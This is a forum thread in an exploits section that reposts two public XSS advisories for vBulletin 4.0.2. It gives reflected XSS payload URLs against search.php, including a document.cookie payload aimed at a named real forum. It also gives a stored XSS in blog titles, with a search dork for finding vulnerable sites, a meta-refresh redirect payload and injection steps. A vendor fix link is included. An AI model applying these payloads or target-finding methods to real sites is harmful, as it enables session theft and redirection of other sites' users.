Jump to content
Gabriel87

Vbulletin 4.0.2 XSS Vulnerability

By Gabriel87, in Exploituri

Recommended Posts

Gabriel87 Newbie

Gabriel87

Posted
Posted (edited) 
Exploit Code : 

# SecurityReason Note :
# Fix : http://www.vbulletin.com/forum/showthread.php?346486-Security-Fix-Releases-3.7.7-and-4.0.2-PL-2

[+] Vbulletin 4.0.2 XSS Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm 5ubzer0  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>

Exemple:

http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

# ~ - [ [ : Inj3ct0r : ] ]

Edited by Nytro
Nytro Mentor

Nytro

Posted
Posted

Nu stiu cat de adevarat e ca a fost gasit de cineva de la Inj3ct0r... A gasit cineva un forum <= 4.02 ?

Si am mai vazut si asta:

Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat
Version: Vbulletin 4.0.2

Dork: Powered by vBulletin™  Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.

The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register
Go to Blogs page
Create New Post
Inject your java script into Title Box
You must go back to Main page to see this XSS effect.

Greets: Neo, Sa3id, All Tkurd.net Members

Sursa: Vbulletin Blog 4.0.2 Title XSS Vulnerability

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...